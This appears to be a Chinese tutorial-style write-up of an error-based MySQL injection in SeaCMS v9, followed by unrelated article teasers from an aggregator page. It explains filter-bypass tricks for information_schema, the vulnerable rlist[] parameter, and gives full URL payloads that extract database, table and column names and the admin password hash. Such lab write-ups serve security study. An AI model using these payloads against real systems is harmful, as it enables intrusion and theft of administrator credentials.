当前位置：首页 > news >正文

seacms v9 实现的MySQL注入

news 2025/11/21 22:23:12

过滤关键词information_schema 怎么办

一、环境搭建

二、环境分析

三、源代码分析

1、过滤程序

2、注入点

四、获取数据库名

五、获取数据库表名

六、获取表的列名

七、获取数据信息

过滤关键词information_schema 怎么办

1.、利用sys数据库（MySQL 5.7+） sys库是MySQL官方提供的系统监控数据库，可能未被过滤。

例：查询表名和列名

SELECT table_name FROM sys.schema_table_statistics; SELECT column_name FROM sys.schema_columns WHERE table_name='users';

2、利用mysql系统库 mysql库存储用户权限信息，部分表可能包含元数据。

例：通过innodb_table_stats和innodb_index_stats获取表名

SELECT table_name FROM mysql.innodb_table_stats;

3.、编码混淆

十六进制编码：information_schema → 0x696E666F726D6174696F6E5F736368656D61

SELECT * FROM 0x696E666F726D6174696F6E5F736368656D61.tables;

Unicode编码：i → CHAR(105)

4、字符串拼接使用CONCAT()或SUBSTR()绕过简单过滤

SELECT * FROM CONCAT('inform', 'ation_schema').tables;

5、. 注释符干扰插入注释分隔符：/**/或/*!*/

SELECT * FROM infor/*!mation_schema*/.tables;

一、环境搭建

二、环境分析

在海洋cms V9 中，用户输入（如登录、评论、分页、ID 等）未经过适当的验证和清理，直接嵌入到 SQL 查询中，导致了 SQL 注入攻击的发生。

三、源代码分析

1、过滤程序

整个模式由三部分组成：前面是一个否定字符组`[^0-9a-z@\._-]{1,}`，中间是关键字组`(union|sleep|...)`，后面又是同样的否定字符组。这个结构可能是在匹配那些被非允许字符包围的关键字，比如`union`前后有特殊符号的情况。

[^0-9a-z@\._-]{1,} # 第一部分：匹配非允许字符的连续序列
(union|sleep|benchmark|load_file|outfile) # 第二部分：匹配危险SQL关键词
[^0-9a-z@\.-]{1,} # 第三部分：再次匹配非允许字符的连续序列

2、注入点

参数rlist[]被用作数组传递，可能在后端代码中被直接拼接到SQL查询中，没有进行充分的过滤或参数化处理，导致注入发生。

$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";

四、获取数据库名

?gid=1&page=2&rlist[]=@`%27`,extractvalue(1,concat_ws(0x20,%200x5c,(select%20database()))),@`%27`

gid=1：ID（数值型）。

page=2：分页参数。

extractvalue()：MySQL XML处理函数，用于触发错误。

concat_ws()：用分隔符连接字符串，0x20是空格，0x5c是反斜杠\。

select database()：获取当前数据库用户。

攻击者访问构造的URL，服务器处理rlist[]参数。后端代码将rlist[]值拼接到IN子句：执行时因非法XPath语法报错，错误信息包含数据库用户

五、获取数据库表名

当sea_comment表中无数据时不会回显报错

添加数据后成功回显

?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0atable_name%20from%23%0ainformation_schema.tables%20where%20table_schema%20=0x736561636d73%20limit%200,1))),%20@`%27`

六、获取表的列名

?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0acolumn_name%20from%23%0ainformation_schema.columns%20where%20table_schema%20=0x736561636d73%20and%20table_name=0x7365615f61646d696e%20limit%201,1))),%20@`%27`

?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0acolumn_name%20from%23%0ainformation_schema.columns%20where%20table_schema%20=0x736561636d73%20and%20table_name=0x7365615f61646d696e%20limit%202,1))),%20@`%27`

七、获取数据信息

?gid=1&page=2&type=1&rlist[]=@`%27`,updatexml%20(1,concat_ws(0x7e,0x7e,(select%20name%20from%23%0asea_admin%20limit%200,1)),1),%20@`%27`

?gid=1&page=2&type=1&rlist[]=@`%27`,updatexml%20(1,concat_ws(0x7e,0x7e,(select%20password%20from%23%0asea_admin%20limit%200,1)),1),%20@`%27`

由于password进行的md5加密，将注入结果（f297a57a5a743894a0e4）进行解密后得到admin

seacms v9 实现的MySQL注入

目录过滤关键词information_schema 怎么办一、环境搭建二、环境分析三、源代码分析 1、过滤程序 2、注入点四、获取数据库名五、获取数据库表名六、获取表的列名七、获取数据信息过滤关键词information_schema 怎么办 1.、利用sys数据库（MySQL 5.…...

编程日记 2025/2/27 21:19:02

Go中slice和map引用传递误区

背景关于slice和map是指传递还是引用传递，很多文章都分析得模棱两可，其实在Go中只有值传递，但是很多情况下是因为分不清slice和map的底层实现，所以导致很多人在这一块产生疑惑，下面通过代码案例分析slice和map到底是…...

编程日记 2025/2/27 21:18:00

C# Unity 唐老狮 No.2 模拟面试题

本文章不作任何商业用途仅作学习与交流安利唐老狮与其他老师合作的网站,内有大量免费资源和优质付费资源,我入门就是看唐老师的课程打好坚实的基础非常非常重要: Unity课程 - 游习堂 - 唐老狮创立的游戏开发在线学习平台 - Powered By EduSoho 如果你发现了文章内特殊的字体…...

编程日记 2025/2/27 21:15:56

【Uniapp-Vue3】开发userStore用户所需的相关操作

在项目根路径下创建的stores文件夹中创建user.js文件并将以下内容复制到user.js中 import {ref} from "vue" import { defineStore } from pinia; const uniIdCo uniCloud.importObject("uni-id-co") const db uniCloud.database(); const usersTable…...

编程日记 2025/2/27 21:13:53

DeepSeek开源周首日：发布大模型加速核心技术可变长度高效FlashMLA 加持H800算力解码性能狂飙升至3000GB/s

FlashMLA的核心技术特性包括对BF16精度的全面支持，以及采用块大小为64的页式键值缓存（Paged KV Cache）系统，实现更精确的内存管理。在性能表现方面，基于CUDA12.6平台，FlashMLA在H800SXM5GPU上创下了显著成绩…...

编程日记 2025/2/27 21:11:50

易语言模拟真人鼠标轨迹算法 - 防止游戏检测

一.简介鼠标轨迹算法是一种模拟人类鼠标操作的程序，它能够模拟出自然而真实的鼠标移动路径。鼠标轨迹算法的底层实现采用C/C语言，原因在于C/C提供了高性能的执行能力和直接访问操作系统底层资源的能力。鼠标轨迹算法具有以下优势： 模拟…...

编程日记 2025/2/27 21:08:41

DeepSeek 提示词：基础结构

🧑 博主简介：CSDN博客专家，历代文学网（PC端可以访问：https://literature.sinhy.com/#/?__c1000，移动端可微信小程序搜索“历代文学”）总架构师，15年工作经验，精通Java编…...

编程日记 2025/2/27 21:04:34

文件系统

目录 1.认识磁盘磁盘的物理结构 CHS定位法磁盘的逻辑结构 2.认识文件系统 inode 分区和分组磁盘上的文件系统 3.软硬链接软链接软链接的操作创建软链接查看软链接删除软链接软链接的特点软链接的使用场景硬链接硬链接的操作创建硬链接查看硬…...

编程日记 2025/2/27 21:01:28

力扣LeetCode：1472 设计浏览器历史记录

题目： 你有一个只支持单个标签页的浏览器 ，最开始你浏览的网页是 homepage ，你可以访问其他的网站 url ，也可以在浏览历史中后退 steps 步或前进 steps 步。请你实现 BrowserHistory 类： BrowserHistory(string h…...

编程日记 2025/2/27 20:58:25

【FL0091】基于SSM和微信小程序的社区二手物品交易小程序

🧑‍💻博主介绍🧑‍💻 全网粉丝10W,CSDN全栈领域优质创作者，博客之星、掘金/知乎/b站/华为云/阿里云等平台优质作者、专注于Java、小程序/APP、python、大数据等技术领域和毕业项目实战，以及程序定制化开发…...

编程日记 2025/2/27 20:52:15

【笔记ing】每天50个英语词汇

ex- e-out exclude 排外，排除 expect 期待，期望单词构成： 前缀（prefix）：情感（emotion）方向（orientation） 词根（root）&#xf…...

编程日记 2025/2/27 20:46:06

联想 SR590 服务器 530-8i RAID 控制器更换损坏的硬盘

坏了的硬盘会自动亮黄灯。用一个空的新盘来替换，新盘最好不要有东西。但是有东西可能也没啥，因为我看 RAID 控制器里有格式化的选项 1. 从 IPMI 把服务器关机，电源键进入绿色闪烁状态 2. 断电，推开塑料滑块拉出支架，…...

编程日记 2025/2/27 20:40:57

Java基础关键_012_包装类

目录一、基本数据类型对应的包装类 1.概览 2.说明二、包装类 1.最大值与最小值 2.构造方法 3.常用方法（Integer为例） （1）compare(int x, int y) （2）max(int a, int b) 和 min(int a, int b) &…...

编程日记 2025/2/27 20:36:50

【react】TypeScript在react中的使用

目录一、环境与项目配置 1. 创建 TypeScript React 项目 2. 关键tsconfig.json配置 3.安装核心类型包二、组件类型定义 1. 函数组件（React 18） 2.类组件三、Hooks 的深度类型集成 1. useState 2. useEffect 3. useRef 4. 自定义 Hook 四、事…...

编程日记 2025/2/27 20:23:37

vllm的使用方式，入门教程

vLLM是一个由伯克利大学LMSYS组织开源的大语言模型推理框架，旨在提升实时场景下的大语言模型服务的吞吐与内存使用效率。以下是详细的vLLM使用方式和入门教程： 1. 前期准备在开始使用vLLM之前，建议先掌握一些基础知识，包括操作…...

编程日记 2025/2/27 20:22:36

IDEA 使用codeGPT+deepseek

一、环境准备 1、IDEA 版本要求安装之前确保 IDEA 处于 2023.x 及以上的较新版本。 2、Python 环境安装 Python 3.8 或更高版本为了确保 DeepSeek 助手能够顺利运行，您需要在操作系统中预先配置 Python 环境。具体来说，您需要安装 Python 3.8 或更高…...

编程日记 2025/2/27 20:15:25

vue3中测试：单元测试、组件测试、端到端测试

1、单元测试：单元测试通常适用于独立的业务逻辑、组件、类、模块或函数，不涉及 UI 渲染、网络请求或其他环境问题。 describe(increment, () > {// 测试用例 }) toBe()：用于严格相等比较（），适用于原始类…...

编程日记 2025/2/27 20:10:18

机器学习介绍与数据集

一、机器学习介绍与定义 1.1 机器学习定义机器学习（Machine Learning）是让计算机从数据中自动学习规律，并依据这些规律对未来数据进行预测的技术。它涵盖聚类、分类、决策树、贝叶斯、神经网络、深度学习（Deep Learning&#xf…...

编程日记 2025/2/27 20:09:15

React 源码揭秘 | 更新队列

前面几篇遇到updateQueue的时候，我们把它先简单的当成了一个队列处理，这篇我们来详细讨论一下这个更新队列。有关updateQueue中的部分，可以见源码 UpdateQueue实现 Update对象我们先来看一下UpdateQueue中的内容，Update对象&…...

编程日记 2025/2/27 20:08:12

关于网络端口探测：TCP端口和UDP端口探测区别

网络端口探测是网络安全领域中的一项基础技术，它用于识别目标主机上开放的端口以及运行在这些端口上的服务。这项技术对于网络管理和安全评估至关重要。在网络端口探测中，最常用的两种协议是TCP（传输控制协议）和UDP（用…...

编程日记 2025/2/27 20:04:05

C++_核心编程_多态案例二-制作饮品

#include <iostream> #include <string> using namespace std;/*制作饮品的大致流程为：煮水 - 冲泡 - 倒入杯中 - 加入辅料利用多态技术实现本案例，提供抽象制作饮品基类，提供子类制作咖啡和茶叶*//*基类*/ class AbstractDr…...

编程新知 2025/11/20 15:22:14

深入剖析AI大模型：大模型时代的 Prompt 工程全解析

今天聊的内容，我认为是AI开发里面非常重要的内容。它在AI开发里无处不在，当你对 AI 助手说 "用李白的风格写一首关于人工智能的诗"，或者让翻译模型 "将这段合同翻译成商务日语" 时，输入的这句话就是 Prompt。…...

编程新知 2025/11/21 21:13:05

树莓派超全系列教程文档--(61)树莓派摄像头高级使用方法

树莓派摄像头高级使用方法配置通过调谐文件来调整相机行为使用多个摄像头安装 libcam 和 rpicam-apps依赖关系开发包文章来源： http://raspberry.dns8844.cn/documentation 原文网址配置大多数用例自动工作，无需更改相机配置。但是，一…...

编程新知 2025/11/21 6:09:16

脑机新手指南（八）：OpenBCI_GUI：从环境搭建到数据可视化（下）

一、数据处理与分析实战 （一）实时滤波与参数调整基础滤波操作 60Hz 工频滤波：勾选界面右侧 “60Hz” 复选框，可有效抑制电网干扰（适用于北美地区，欧洲用户可调整为 50Hz）。平滑处理&…...

编程新知 2025/11/19 22:56:53

P3 QT项目----记事本（3.8）

3.8 记事本项目总结项目源码 1.main.cpp #include "widget.h" #include <QApplication> int main(int argc, char *argv[]) {QApplication a(argc, argv);Widget w;w.show();return a.exec(); } 2.widget.cpp #include "widget.h" #include &q…...

编程新知 2025/11/16 21:55:09

PL0语法，分析器实现！

简介 PL/0 是一种简单的编程语言，通常用于教学编译原理。它的语法结构清晰，功能包括常量定义、变量声明、过程（子程序）定义以及基本的控制结构（如条件语句和循环语句）。 PL/0 语法规范 PL/0 是一种教学用的小型编程语言，由 Niklaus Wirth 设计，用于展示编译原理的核…...

编程新知 2025/11/17 1:39:48

LINUX 69 FTP 客服管理系统 man 5 /etc/vsftpd/vsftpd.conf

FTP 客服管理系统实现kefu123登录，不允许匿名访问，kefu只能访问/data/kefu目录，不能查看其他目录创建账号密码 useradd kefu echo 123|passwd -stdin kefu [rootcode caozx26420]# echo 123|passwd --stdin kefu 更改用户 kefu 的密码…...

编程新知 2025/11/17 10:39:39